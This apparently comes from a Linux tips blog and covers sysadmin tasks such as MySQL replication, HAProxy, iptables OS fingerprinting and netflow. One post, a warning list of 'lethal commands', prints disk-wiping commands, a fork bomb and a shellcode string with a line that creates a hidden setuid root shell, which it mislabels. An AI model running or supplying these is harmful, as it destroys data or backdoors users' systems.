FAQ: How to set up atomatic Linux reboot if kernel panic occurs?

Question: How can I get my Linux server rebooted/restarted automatically if it caught a kernel panic?
Answer: As you might know, kernel panic is an action taken by an operating system upon detecting an internal fatal error from which it cannot safely recover; the term is largely specific to Unix and Unix-like systems (it’s a wiki’s description).
By default Linux wouldn’t not reboot after panic occurs, but the following option of sysctl will cause a kernel to reboot after N seconds you specify. In our example server will be rebooted in 15 seconds if kernel panic stopped its operation:
1. Open sysctl’s configuration file:
sudo nano /etc/sysctl.conf
2. Add there the following line:
kernel.panic = 15
or
1. Execute the following command:
/sbin/sysctl -w kernel.panic=15

FAQ: How to block/allow packets sent by specific Operating System with iptables?

Question: How can I block traffic coming from specific operating system in Linux? In other words, how can I block traffic from Windows users on my firewall and allows other people?

Answer: There is an iptables module named OSF (passive OS Fingerprinting) that was written by Evgeniy Polyakov. This module allows passively detect OS packet was sent from and perform various netfilter actions based on this match. Packets with SYN bit set are analyzed.

In order to install OSF module, do the following:

1. Download latest release from here, for example as follows:
wget http://tservice.net.ru/~s0mbre/archive/osf/osf-2008_06_14.tar.gz

2. Edit Makefile from unpacked archive in order to set proper path to iptables headers (iptables.h and libiptc/ dir).

3. If your kernel sources can not be accessed via /lib/modules/$(shell uname -r)/build, you have to replace KDIR variable with the correct path to kernel sources.
4. Run make that should build ipt_osf.ko kernel module.
5. Run make lib that will build libipt_osf.so shared library (copy it to where all other iptables shared libs are placed in your distro e.g. /lib/iptables or /lib64/iptables in Fedora).

6. Run make bin that will build userspace applications which allows to load fingerprints and obtain information about matched packets (load, osfd, ucon_osf).

7. Download signatures list:
wget http://www.openbsd.org/cgi-bin/cvsweb/src/etc/pf.os

8. Install kernel module:
insmod ./ipt_osf.ko

9. Load signatures:
./load ./pf.os /proc/sys/net/ipv4/osf

10. Set up iptables rules allowing/disallowing packets generated by certain OS:
iptables -I INPUT -j ACCEPT -p tcp -m osf --genre Linux --log 0 --ttl 2

This example allows traffic from Linux systems and logs packets from other ones:
ipt_osf: Windows [2000:SP3:Windows XP Pro SP1, 2000 SP3]: 11.22.33.55:4024 -> 11.22.33.44:139

BTW, OSF has following options:

• –log
  If present, OSF will log determined genres even if they don’t match desired one.
  0 – log all matched and unknown entries.
  1 – only first one.
  2 – log all matched entries.
• –ttl
  0 – true ip and fingerprint TTL comparison. Works for LAN.
  1 – check if ip TTL is less than fingerprint one. Works for global addresses.
  2 – do not compare TTL at all. Allows to detect NMAP, but can produce false results.
• –connector
  If present, OSF will log all events also through netlink connector(1.0 id).
  More about connector can be found in Documentation/connector in kernel source tree.

Change MAC address of network interface in Linux

Well, thankfully this is rather trivial task for Linux and you can change MAC address of your network adapter using a few CLI/console commands. Honestly speaking it is impossible to literally change MAC address as it’s loaded into firmware but you can configure Linux so it will transform old MAC to the new one the fly.

The commands are are below but before typing them let’s consider why one might need this. One of the simplest examples is here: you acquire IP address, gateway, DNS entries via DHCP server which is set up to give out your IP settings to your MAC address only so if you change [possibly broken] network adapter you will need to ask sysadmin to change DHCP server’s settings… If this looks familiar to you, just type the following commands with sudo prefix or under superuser/root:

ifconfig eth0 down
ifconfig eth0 hw ether 00:19:7e:53:8c:a3
ifconfig eth0 up

eth0 – is hardware name of your network interface, you can use ip link to see all available interfaces identified by your system.
00:19:7e:53:8c:a3 is new MAC address you’d like to apply to the NIC.

These commands should be added into startup scripts if you require them to appear after Linux system reboots. This works on any distribution like Fedora, Ubuntu, Debian, RedHat, Suse whatever.

Set Linux Gateway

One can say that it is rather trivial task to set Linux gateway (or in other words to set up/change default gateway in Linux operating system) but I noticed that this question is one of the most popular among linux newbies so I decided to post a quick tip here on Linux Screw.

There are two most used ways to set up default gateway using Linux console. Of course modern linux distributions comes with graphical tools and programs for this purpose but old school CLI commands will live forever as are very simple and allow to do the job very quickly:

route add default gw 10.0.0.1
where 10.0.0.1 is IPv4 IP address of default gatway you would like to set up in your Linux.

ip route add default via 10.0.0.1

According to general networking recommendation it is a good practice to have gateway’s IP as the last IP from selected pool so very often default gateway’s IP will end with .254 e.g. 10.0.0.254. Anyway using above mentioned commands you can apply ANY default gateway. By the way, if you’d like to delete current default gateway, here is corresponding command:

route del default

Hope it helps!

P.S. Don’t forget that these commands require root previleges.

Quick copy/paste MySQL Replication Manual

This quick manual tells how to set up database replication in MySQL. Basically it was written for 5.* MySQL versions but is also applicable for 3.23/4.0 ones (btw they are still in use, believe me).

As you might already know, replication allows you to create a copy of certain MySQL database from a master server on another server (slave). What is the most important, all updates made to that database on master server will be replicated to the database on the slave server immediately, so that both databases are synchronized almost in real time mode (if you need completely real-time synchronization/mirroring, the only solution is to deploy MySQL cluster).

One of the main issues is that replication features coming out-of-the-box with Open Source MySQL software don’t provide full back/forward compatibility. This means that you can easily replicate data from master and slave of the same MySQL versions only e.g. 5.0. But if you like to replicate database from 5.0 master to 4.0 slave (or from 3.23 master to 5.0 slave), it is not possible in most cases.

From the beginning we have two Linux boxes with MySQL installed (5.0.27 version in my example), server has database reptest we need to replicate to slave.

A. Configure Master:

Configure MySQL to accept incoming connections from another hosts in the network. In order to do it, comment the following lines in /etc/my.cnf (exact location depends on Linux distribution you use) as follows:

#skip-networking
#bind-address=127.0.0.1

and restart MySQL by “/etc/init.d/mysql restart” or “mysqladmin reload” command. Make sure that slave can access master’s MySQL via network (e.g. execute on slave “telnet <server_ip> 3306“).

The next step is to configure master to log all database changes into binary log that will be used by slave for replicating, add the following lines to /etc/my.cnf in [mysqld] section:

log_bin = mysql-bin
binlog-do-db=reptest
server-id=1

Then restart MySQL and log on to its shell with root rights:

/etc/init.d/mysql restart
mysql -u root -p
Enter password:

Type in MySQL shell the following commands:

GRANT REPLICATION SLAVE ON *.* TO 'slave_user'@'%' IDENTIFIED BY 'slave_password';
FLUSH PRIVILEGES;

Note: If you use 4.0 MySQL or older, you need to replace REPLICATION SLAVE in above line to FILE, so the lines will look like:

GRANT FILE ON *.* TO 'slave_user'@'%' IDENTIFIED BY 'slave_password';
FLUSH PRIVILEGES;

The next commands are:

USE reptest;
FLUSH TABLES WITH READ LOCK;
SHOW MASTER STATUS;

The last command should provide the following output we will use later on slave server:

mysql> SHOW MASTER STATUS;
+---------------+----------+-----------------+------------------+
| File          | Position | Binlog_do_db    | Binlog_ignore_db |
+---------------+----------+-----------------+------------------+
| mysql-bin.001 |   73     | reptest         |                  |
+---------------+----------+-----------------+------------------+
1 row in set (0.00 sec)

Now quit from MySQL shell as we need to prepare current dump of reptest database: quit.

Now, run from shell “mysqldump -u root -p --opt reptest > reptest.sql” and transfer reptest.sql file to slave server.

2. Configure Slave:

Create reptest database:

mysqladmin create reptest

and apply previously created/transfered dump to it via command:

mysql -u root -p reptest < /path/to/reptest.sql

Now edit /etc/my.cnf on slave and add the following lines to [mysqld] section:

server-id=2
master-host=192.168.0.1
master-user=slave_user
master-password=slave_password
master-connect-retry=60
replicate-do-db=reptest

where 192.168.0.1 is IP address of the server and server-id is unique ID assigned to slave Linux box.

Now restart MySQL with /etc/init.d/mysql restart and log on MySQL shell:

mysql -u root -p reptest
Enter password:

The next step is to apply changes saved in binary log on server:

SLAVE STOP;
CHANGE MASTER TO MASTER_HOST='192.168.0.1', MASTER_USER='slave_user', MASTER_PASSWORD='slave_password', MASTER_LOG_FILE='mysql-bin.001', MASTER_LOG_POS=73;
SLAVE START;

Now whenever reptest is updated on the master, all changes will be replicated to reptest on the slave.

How to disable/remap a keyboard key in Linux?

Q: How can I disable one or several keys of my laptop keyboard in Linux? When I press DELETE key it gets stuck and deletes everything

A: No problem! You can use the following command to remap or disable any key of your keyboard:

xmodmap -e 'keycode <value>=<action>'

For example, run the following to disable your DELETE key: xmodmap -e 'keycode 107='. BTW you can get keycode that corresponds to certain keyboard button by using simple command xev

The full list of available keycodes and actions assigned to them on UK keyboard is below…

keycode 8 =
keycode 9 = Escape
keycode 10 = 1 exclam
keycode 11 = 2 quotedbl
keycode 12 = 3 sterling
keycode 13 = 4 dollar
keycode 14 = 5 percent
keycode 15 = 6 asciicircum
keycode 16 = 7 ampersand
keycode 17 = 8 asterisk
keycode 18 = 9 parenleft
keycode 19 = 0 parenright
keycode 20 = minus underscore
keycode 21 = equal plus
keycode 22 = Delete
keycode 23 = Tab
keycode 24 = Q
keycode 25 = W
keycode 26 = E
keycode 27 = R
keycode 28 = T
keycode 29 = Y
keycode 30 = U
keycode 31 = I
keycode 32 = O
keycode 33 = P
keycode 34 = bracketleft braceleft
keycode 35 = bracketright braceright
keycode 36 = Return
keycode 37 = Control_L
keycode 38 = A
keycode 39 = S
keycode 40 = D
keycode 41 = F
keycode 42 = G
keycode 43 = H
keycode 44 = J
keycode 45 = K
keycode 46 = L
keycode 47 = semicolon colon
keycode 48 = apostrophe at
keycode 49 = grave asciitilde
keycode 50 = Shift_L
keycode 51 = numbersign asciitilde
keycode 52 = Z
keycode 53 = X
keycode 54 = C
keycode 55 = V
keycode 56 = B
keycode 57 = N
keycode 58 = M
keycode 59 = comma less
keycode 60 = period greater
keycode 61 = slash question
keycode 62 = Shift_R
keycode 63 = KP_Multiply
keycode 64 = Alt_L
keycode 65 = space
keycode 66 = Caps_Lock
keycode 67 = F1
keycode 68 = F2
keycode 69 = F3
keycode 70 = F4
keycode 71 = F5
keycode 72 = F6
keycode 73 = F7
keycode 74 = F8
keycode 75 = F9
keycode 76 = F10
keycode 77 = Num_Lock
keycode 78 = Scroll_Lock
keycode 79 = Home KP_7 KP_7 Home
keycode 80 = Up KP_8 KP_8 Up
keycode 81 = Prior KP_9 KP_9 Prior
keycode 82 = KP_Subtract
keycode 83 = Left KP_4 KP_4 Left
keycode 84 = Begin KP_5 KP_5 Begin
keycode 85 = Right KP_6 KP_6 Right
keycode 86 = KP_Add
keycode 87 = End KP_1 KP_1 End
keycode 88 = Down KP_2 KP_2 Down
keycode 89 = Next KP_3 KP_3 Next
keycode 90 = Insert KP_0 KP_0 Insert
keycode 91 = Delete KP_Decimal KP_Decimal Delete
keycode 92 = 0x1007ff00
keycode 93 =
keycode 94 = backslash bar
keycode 95 = F11
keycode 96 = F12
keycode 97 = Home
keycode 98 = Up
keycode 99 = Prior
keycode 100 = Left
keycode 101 = Begin
keycode 102 = Right
keycode 103 = End
keycode 104 = Down
keycode 105 = Next
keycode 106 = Insert
keycode 107 = Delete
keycode 108 = KP_Enter
keycode 109 = Control_R
keycode 110 = Pause
keycode 111 = Print
keycode 112 = KP_Divide
keycode 113 = Mode_switch
keycode 114 = Break

How to scrollback in GNU SCREEN?

Q: I was compiling kernel using GNU Screen utility but something happened during the compilation and I want to see full error’s output but I can’t just scrollback using Ctrl+PageUp. How to scrollback in GNU Screen?

A: In GNU Screen press Ctrl + a + [ to enter Copy Mode, then scroll up/down using keys j or k. Below are some other navigation keys:

h -    Move the cursor left by one character
j -    Move the cursor down by one line
k -    Move the cursor up by one line
l -    Move the cursor right by one character
0 -    Move to the beginning of the current line
$ -    Move to the end of the current line.
G -    Moves to the specified line
       (defaults to the end of the buffer).
C-u -  Scrolls a half page up.
C-b -  Scrolls a full page up.
C-d -  Scrolls a half page down.
C-f -  Scrolls the full page down.

By the way, in order to define scrollback buffer size start screen with the following key (5000 lines in this example):

screen -h 5000

Quick info about GNU Screen utility: it is Unix tool that allows to run multiple applications in several “virtual” windows. It is very useful when you need, let’s say, to see hardware resources consumption caused by started application in different console etc. GNU screen is also good option to run applications remotely via ssh: just run application in screen and log off until it’s finished, then just “pick up” screen session and see how the application’s output.

You can use activate copy mode of GNU Screen also by Ctrl + Esc that might be more useful than Ctrl + a + [ shortcut (thanks to Yu-Jie Lin for this tip).

Find location of the program in Ubuntu

It’s rather trivial task for people who use Ubuntu for a long time but newbies usually have problems with adding program to startup if location of the program is unknown or it is required to specify full path to the program somewhere e.g. when opening attachment in mail client. There are two most popular ways to find this out:

1. which gedit
2. type gedit

Both will show full path to certain program (gnome editor in our example): /usr/bin/gedit:

13 Linux lethal commands

In this post we will see all commands which SHOULD NEVER be executed in Linux. Any of them will cause data loss or corruption, can freeze or hang up running system.

NEVER RUN THESE COMMANDS IN LINUX BOX CLI!

Even if somebody advises you in forum/im to do it.

1. Any of these commands will erase everything from your home directory, root or just will clear up whole disk:

• sudo rm -rf /
• rm -rf .*
• dd if=/dev/zero of=/dev/sda
• mkfs.ext3 /dev/hda
• whatever > /dev/hda
• cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
• find -type f -mtime +30 -exec mv {} /dev/null \;
• mv ~ /dev/null
• mv / /dev/null

2. Causes kernel panic or freezes Linux box:

• dd if=/dev/random of=/dev/port
• ){:|:&};: #also known as fork bomb

3. This one does the same as "rm -rf /":

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

4. This one will prevent you from executing commands with root rights:

rm -f /usr/bin/sudo;rm -f /bin/su

Failover and Load Balancing using HAProxy

HAProxy is open source proxy that can be used to enable high availability and load balancing for web applications. It was designed especially for high load projects so it is very fast and predictable, HAProxy is based on single-process model.

In this post I’ll describe sample setup of HAProxy: users’ requests are load balanced between two web servers Web1 and Web1, if one of them goes down then all the request are processed by alive server, once dead servers recovers load balancing enables again. See topology to the right.

Installation

HAProxy is included into repositories for major Linux distributions, so if you’re using Centos, Redhat or Fedora type the following command:

yum install haproxy

If you’re Ubuntu, Debian or Linux Mint user use this one instead:

apt-get install haproxy

Configuration

As soon as HAProxy is installed it’s time to edit its configuration file, usually it’s placed in /etc/haproxy/haproxy.cfg. Official documentation for HAProxy 1.4 (stable) is here.

Here is configuration file to implement setup shown at the diagram and described above:

global user daemon group daemon daemon log 127.0.0.1 daemon   listen http bind 1.2.3.4:80 mode http option tcplog   log global option dontlognull   balance roundrobin clitimeout 60000 srvtimeout 60000 contimeout 5000 retries 3 server web1 web1.example.com:80 check server web2 web2.example.com:80 check cookie web1 insert nocache cookie web2 insert nocache

Let’s stop on most important parts of this configuration file. Section global specifies user and group which will be used to run haproxy process (daemon in our example). Line daemon tells HAProxy to run in background, log 127.0.0.1 daemon specifies syslog facility for sending logs from HAProxy.

Section listen http contains line bind 1.2.3.4:80 that specifies IP address and port that will be used to accept users’ requests (they will be load balanced between Web1 and Web2). Line mode http means that HAProxy will filter all requests different from HTTP and will do load balancing over HTTP protocol.

Line balance roundrobin specifies load balancing algorithm according to which each web server (Web1 and Web2) will be used in turns according to their weights. In our example weights for both servers are the same so load balancing is fair.

Lines server web1 … and server web2 … specify web servers for load balancing and failover, in our case they are load balanced according to round robin algorithm and have the same priority/weight.

The last two lines in configuration files are optional, they makes it possible to preserve cookies, it means for example that if you logged in to web application hosted at Web1 and then HAProxy forwarded your next request to Web2 you will still have logged in session opened as cookies with session id from Web1 will be sent to you from Web2 as well

Install Ubuntu Chromium browser (Google Chrome for Linux)

One of the easiest way to try Chromium browser in Ubuntu Linux (Google Chrome browser for Unix/Linux operating system is named as Chromium) is to use daily binary builds at https://launchpad.net/chromium-project. Today Ubuntu is the most popular Linux disributions for desktops so there are daily builds available for the following Ubuntu versions: hardy, intrepid, jaunty, karmic.

First let your Ubuntu know where it should find chromium-browser deb package:

vi /etc/apt/sources.list

add the following lines:

deb http://ppa.launchpad.net/chromium-daily/ppa/ubuntu jaunty main
deb-src http://ppa.launchpad.net/chromium-daily/ppa/ubuntu jaunty main

Replace jaunty with hardy, intrepid or karmic depending which version you run at your computer. If you feel this information is not sufficient for you, follow this link to get Ubuntu official information on this matter or follow Launchpad help.

The next step is to install Chromium browser:

sudo apt-get update
sudo apt-get install chromium-browser
or
sudo aptitude install chromium-browser

Once you press enter Ubuntu will download around 18 MB of data from launchpad’s server and will install Chromium with gnome menu entries and shortcuts. Now you can go to System menu –> Internet –> Chromium Web Browser in order to launch Google browser.

Ubuntu Chromium Google browser (Google Chrome Ubuntu)

As you might know there is still no official release of chromium/chrome available for Linux, so these daily builds from launchpad are for testing/observations purposes only. For example, there is no flash plugin available so you will be able to see html pages like this one and no swf/flash content. Anyway thanks to Google for great browser which has all chances to become “browser number one” for Linux or even for the rest of operating system such as Windows or Mac.

Top 3 Linux HTML editors

You may think that nowadays nobody uses offline editors as there are so many content management systems (CMS) like Drupal (my favourite one), WordPress, Joomla etc. which contain embedded visual html editors. But today it is sure that sometimes it’s real pain to draw a 10×20 table using WordPress’s editor…

Text editors like gedit, emacs, nano or vi will certainly live forever but thankfully there are numerous visual html editors for my Ubuntu . They are sometimes called WYSIWYG editors, it mean “What You See Is What You Get”.

1. Quanta Plus

This is KDE/Qt visual html editor available as binary package for numerous Linux distributions
including Debian and Ubuntu. From developers’ site:

Quanta Plus is a highly stable and feature rich web development environment.
The vision with Quanta has always been to start with the best architectural
foundations, design for efficient and natural use and enable maximal user
extensibility.

In order to install it in Debian/Ubuntu run the following CLI command:

sudo apt-get install quanta

Fedora, Centos, Redhat users type this:

sudo yum install kdewebdev

I found Quanta html editor extremely useful, this is just an outstanding application of this
field.

2. Bluefish

Bluefish is a powerful editor targeted towards programmers and webdesigners,
with many options to write websites, scripts and programming code. Bluefish
supports many programming and markup languages, and it focuses on editing
dynamic and interactive websites.

I found this really versatile html editor. Besides HTML/CSS it handles C,
Java, Perl, Python, XML and others.

Ubuntu and Debian users type:

sudo apt-get install bluefish

Fedora/Redhat/Centos:

sudo yum install bluefish

Gentoo:

emerge bluefish

3. Screem

SCREEM is a web development environment. It’s purpose is to increase
productivity when constructing a site, by providing quick access to commonly
used features. While it is written for use with the GNOME desktop environment
in mind it does not specifically require you to be running it, just have the
libraries installed.

This is one of the most user-friendly Gnome HTML editor. Its simple interface
brings extremely powerfull HTML editor so if like minimalistic design Screem
is your choice.

 

Fastest way to create ramdisk in Ubuntu/Linux

Many of you will agree that sometimes it’s really good idea to have some small amount of RAM mounted as a filesystem. It may be necessary when running some bash or perl script that handles, say, thousands of small files so it’s much more effective not to waste computer resources on reading/writing data on hard disk but keep those files directly in memory.

This idea is known as Virtual RAM Drive or ramdisk and can be setup in Ubuntu or almost any other Linux distribution using the following commands under root (to become root in Ubuntu use "sudo -s“):

# mkdir /tmp/ramdisk; chmod 777 /tmp/ramdisk
# mount -t tmpfs -o size=256M tmpfs /tmp/ramdisk/

where 256M is amount of RAM you wish to allocate for ramdisk. It’s clear that this value should be less than amount of free memory (use “free -m“). BTW, if you specify too many MBs for ramdisk Linux will try to allocate it from RAM and then from swap so resulting performance would be very poor.

The easiest way to split and merge pdf files in Ubuntu

The easiest way to split, merge or edit pdf files in Ubuntu is to use pdftk utility. This rather old (latest version was released in 2006) but still simple and powerful program can be installed in Ubuntu (Debian or any deb-family Linux distribution) by the following command in terminal:

sudo aptitude install pdftk
(if you run Fedora, RedHat or CentOS use this one: sudo yum install pdftk)

Split large pdf into many one-page files:

pdftk largepdfile.pdf burst

(as the result you will get many small files like pg_0001.pdf, pg_0002.pdf and so on).

Merge files into one PDF file:

pdftk *.pdf cat output onelargepdfile.pdf

pdftk is extremely powerful and makes it possible to do almost anything with input pdf files. Thus above two commands are just examples showing how to split and merge pdf files in Ubuntu easily.

How to assign range of IP addresses in Linux?

As we know Linux allows to assign almost unlimited number of IP addresses to its interfaces. Such additional IPs applied to the same NIC are known as secondary IP addresses or just secondaries. Some time ago i faced a problem on how to apply about 500 IP addresses to one Linux box and then ensure that all of them get online after Linux reboots. There are several ways to accomplish this taks so i would like to share them all.

Shell script with ifconfig commands

This is one of the most inefficient ways to get many IP addresses applied to one network interface. Anyways it allows to create as many aliases for the interface as you like so you should create shell script and execute it every time Linux boots.

touch /path/to/script.sh
chmod +x /path/to/script.sh
vi /path/to/script.sh

Now you should add there shell lines which will apply IP addresses, e.g. the following one applies 60 IP addresses to eth0 interface:

for n in {3..63};  do ifconfig eth0:${n} 10.10.10.${n} netmask 255.255.255.0 up; done

If you type ‘ifconfig’ now you will very long output like this one:

eth0:3  Link encap:Ethernet  HWaddr 00:50:8D:D1:24:DB  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:10 Base address:0x2000 

eth0:4  Link encap:Ethernet  HWaddr 00:50:8D:D1:24:DB  
          inet addr:10.10.10.4  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:10 Base address:0x2000

...

eth0:63  Link encap:Ethernet  HWaddr 00:50:8D:D1:24:DB  
          inet addr:10.10.10.63  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:10 Base address:0x2000 

If you decide to delete those IPs you can run the following line as a remedy:

for n in {3..63};  do ifconfig eth0:${n} 0.0.0.0 &> /dev/null; done

Once you finished editing /path/to/script.sh script you should add it to startup, so put the line /path/to/script.sh into /etc/rc.local file that Linux executes every time it boots. Please notice that in various distributions this file may be missing so consult with distro’s docs to get where it is stored.

Redhat/Centos/Fedora network scripts

Users of these Linux distributions can apply ranges of IP addresses using ifcfg-eth0-range0 files which are read during initialization of network interfaces during boot up process. The following example will make Linux to apply 200 IP addresses to eth1 during booting:

[root ~]#cat /etc/sysconfig/network-scripts/ifcfg-eth1-range0

IPADDR_START=192.168.1.1
IPADDR_END=192.168.1.200
CLONENUM_START=10

CLONENUM_START value specifies starting identifier of alias that will be applied to eth1 interface, in above example the first 192.168.1.1 will be assigned to eth1:10 alias. The last IP of the range 192.168.1.200 will be applied to eth:210 sub-interface. This is totally easy approach.

Loopback interface

Did you know that by one line presented below you assign 1022 virtual IP addresses to your Linux system? Here it is:

ifconfig lo:0 10.0.0.1/22

Now you can make sure of this by pinging IPs from that range (10.0.0.1 – 10.0.3.254).

[root ~]#ping 10.0.0.1 -c 1
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.063 ms

--- 10.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.063/0.063/0.063/0.000 ms

...

[root ~]#[root@whitehorse /]# ping 10.0.3.254 -c 1
PING 10.0.0.1 (10.0.3.254) 56(84) bytes of data.
64 bytes from 10.0.3.254: icmp_seq=1 ttl=64 time=0.063 ms

--- 10.0.3.254 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.063/0.063/0.063/0.000 ms

Quick Tip: Increase port range available for applications

By default an average Linux distribution allows applications to use the following TCP port range for outgoing connections: 32,786-65,536. That’s why your system can handle up to 28,232 TCP sessions at time. Notice, this is more than enough if your Linux system is installed on the laptop or desktop and you just use it for occasional visits to facebook.com, gmail.com and linuxscrew.com (yeah!). But if you run proxy/webcache like squid or some other services which open a lot of outgoing TCP connections you will likely hit ceiling of 28,232 soon.

First of all, let’s see current port range available for TCP sessions:

cat /proc/sys/net/ipv4/ip_local_port_range

Most likely the output will show something like this one “32786 65536″. In order to expand this range you can either echo modified range into above file in /proc filesystem (temporary solution) or add corresponding line into /etc/sysctl.conf (constant solution).

To temporarily expand port range from 28,232 to 40,000 do the following:

sudo -s
echo "25000 65000" > /proc/sys/net/ipv4/ip_local_port_range

To make sure new port range will be applied after reboot add the following line to /etc/sysctl.conf:

net.ipv4.ip_local_port_range="25000 65000"

or just execute this:

sudo sysctl -n net.ipv4.ip_local_port_range="25000 65000"

Install nfdump and nfsen netflow tools in Linux

Using nfsen it is possible to view IP traffic statistics on Linux interfaces including the graphs showing data sent and received (see the screenshot to the right) as well as historical information about all data transfers. So after you’ve configured nfsen and nfdump to monitor traffic on certain Linux server or router you’ll be able to answer the following example questions:

What IP was downloading data through 48161 last Wednesday? or How many bytes were sent to IP 8.8.8.8 via 53 port from Linux server? These are the only examples so nfdump and nfdump netflow tools gives you wide range of capabilities to monitor and analyze traffic on your Linux host.

Netflow is the protocol developed by Cisco to manage data about IP traffic. In a few words using Netflow you can collect data about all IP data send/received on multiple Cisco/Linux/BSD/Juniper hosts and send it to central Netflow collector that will show you the nice graphs and also will allow to have a complete picture of what data was sent/received on those hosts (including destination and source IP, port, bytes transfered, int/out interfaces etc). Nfdump is netflow collector. Nfsen is graphical tools for generating graphs and querying Nfdump for historical traffic reports. In this article you will see how to deploy all this staff in Linux.

Netflow probe is required to collect IP traffic data on Linux host. In general this piece of sofware will sit in background, store every network activity on certain network interface and then send collected data to Netflow collector nfdump. As Netflow probe I prefer fprobe that is totally simple application that just does its job. If you feel that fprobe is not what you need or there are some problems with installing it you can try softflowd that can do the same job.

Install fprobe from sources:

cd /usr/src/
sudo -s
wget http://sourceforge.net/projects/fprobe/files/fprobe/1.1/fprobe-1.1.tar.bz2/download
tar -xvjf fprobe-1.1.tar.bz2
cd fprobe-1.1
./configure --prefix=/
make
make install

Point fprobe to one of network interfaces of Linux host and make it to send data to Netflow collector:

fprobe -i eth0 11.22.33.44:23456

In above example fprobe stores all data trasnfers on eth0 network interface and sends collected data to 11.22.33.44 host via 23456 UDP port (you may want to change firewall rules to make Netflow working over 23456 UDP port).

Install nfdump Netflow collector from sources:

cd /usr/src/
sudo -s
wget http://sourceforge.net/projects/nfdump/files/stable/nfdump-1.6.2/nfdump-1.6.2.tar.gz/download
tar -xvzf nfdump-1.6.2.tar.gz
cd nfdump-1.6.2
./configure --prefix=/ --enable-nfprofile
make make
install

When finished Netflow collector becomes ready so you can start capturing traffic from Netflow probe. If you don’t need any graphical tools like nfsen described below you can just start collector and save Netflow data in /var/neflow/ directory (THIS STEP IS OPTIONAL):

/bin/nfcapd -w -D -p 23456 -B 200000 -S 1 -z -I Linux-Host-1-eth0 -l /var/netflow/

In order to install nfsen from sources you have to get all its prerequisites, run one of below lines depending on what Linux distro you’re using (1st line is for Fedora, Centos, Redhat while 2nd line is for Ubuntu, Debian, Mint and similar):

yum install rrdtool rrdtool-devel rrdutils perl-rrdtool -y

or

aptitude install rrdtool librrd2-dev librrd-dev librrd4 librrds-perl librrdp-perl

Compile nfsen from sources:

cd /usr/src/
sudo -s
wget http://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.5/nfsen-1.3.5.tar.gz/download
tar -xvzf nfsen-1.3.5.tar.gz
cd nfsen-1.3.5
cp etc/nfsen-dist.conf etc/nfsen.conf

In order to continue the installation you should edit file etc/nfsen.conf to specify where to install nfsen, web server’s username (yes, you have to install apache, lighttpd, nginx or any other web server first), its document root directory etc. The major section of that config file is ‘Netflow sources’ that must list all hosts you’ve started Netflow probes at. Here is an example section for monitoring above Linux host:

%sources = (
    'Linux-Host-eth0'    => { 'port' => '23456', 'col' => '#ff0000', 'type' => 'netflow' },
);

When finished it’s time to actually install nfsen using installation script:

./install.pl etc/nfsen.conf

In case of successful installation you will be notified with corresponding congratulations message so it would be proper time to start nfsen daemon:

/path/to/nfsen/bin/nfsen start

Now you can open http://localhost/nfsen/nfsen.php at Linux host where nfsen was installed to start using this Netflow tool and see some graphs. Notice that it takes about 5-10 minutes to see first bars at the graphs, if the graphs are still empty you will have to check at least the following:

1. If fprobe is able to communicate to Netwflow collector and can send Netflow data to it (use ‘ps ax | grep fprobe’ and Linux host being monitored and tcpdump tool at Netflow collector).
2. If Netflow collector is started and can receive data from Netflow probe. Use ‘ps ax | grep nfcapd’ and tcpdump at Netflow collector Linux host.

Top 5 Password Managers for Linux

In this post you will find set of password managers for Linux which provides secure storage for your passwords for sensitive data. If you still keep the passwords in plain text then you must consider one of available password managers .

KeePassX

KeePassX has been a very popular and famous password manager for Linux for a very long time and still trusted by pretty big number of users. When user launches the KeePassX password manager first it requires to set up of a master password to add an extra layer of security to password storage. As an option you can use a file with encryption key instead of the password. This key file can be used along with the master password to provide stronger security. KeePassX application is rather simple so you can easily create one or more databases which will have a master password and will contain all the login credentials stored encrypted. This manager is considered to be one of the most secure managers. If you’re Ubuntu user just type in terminal the following command:

sudo apt-get install keepassx

GPassword Manager

Gpassword Manager (GPM) is also one of the most secure and highly rated password managers which have more friendly and easy to use interface that KeePassX. This utility has many features that make it to be a good choice for most of the high level computer users. This password manager allows to set and add favorites into system-tray that is one of the unique features of this application. GPM utility uses the crypto++ method for encryption which can be used in Windows and Linux hence it enables the same database to be used on different platforms without the need to convert anything.

My Passwords

My Passwords is a simple and easy to use utility that allows you to store all your login credentials in an encrypted manner within a file. The most exciting feature of this utility are its speed and no requirement of an installation. Encryption algorithm that is used there is AES. Storage in Derby Database format along with AES encryption gives the user the power to create secure and fast password repository. The interface for this utility is fairly simple.

Fiagaro’s Password Manager 2

Fiagaro’s Password Manager 2 is another powerful tool with strong encryption methods that makes it one of the most secure utility for managing passwords in Linux. Fiagaro’s Password Manager 2 uses the AES-256 encryption of the database files which hold all your login credentials (it uses master password that should be set up once you started the program first).

Gringotts

Gringotts is rather old project: its application for Linux/Unix provides the user the possibility to store his or her notes in secure storage encrypted by symmetrical ciphers. Gringotts has a set of eight different algorithms that can be used to encrypt the desired data. This utility also provides different methods for hashing as well as compression. The interface of Gringotts is not as simple as of other password Managers but still easy to use and most effective for old school bearded Unix users.

Limit CPU usage of Linux process

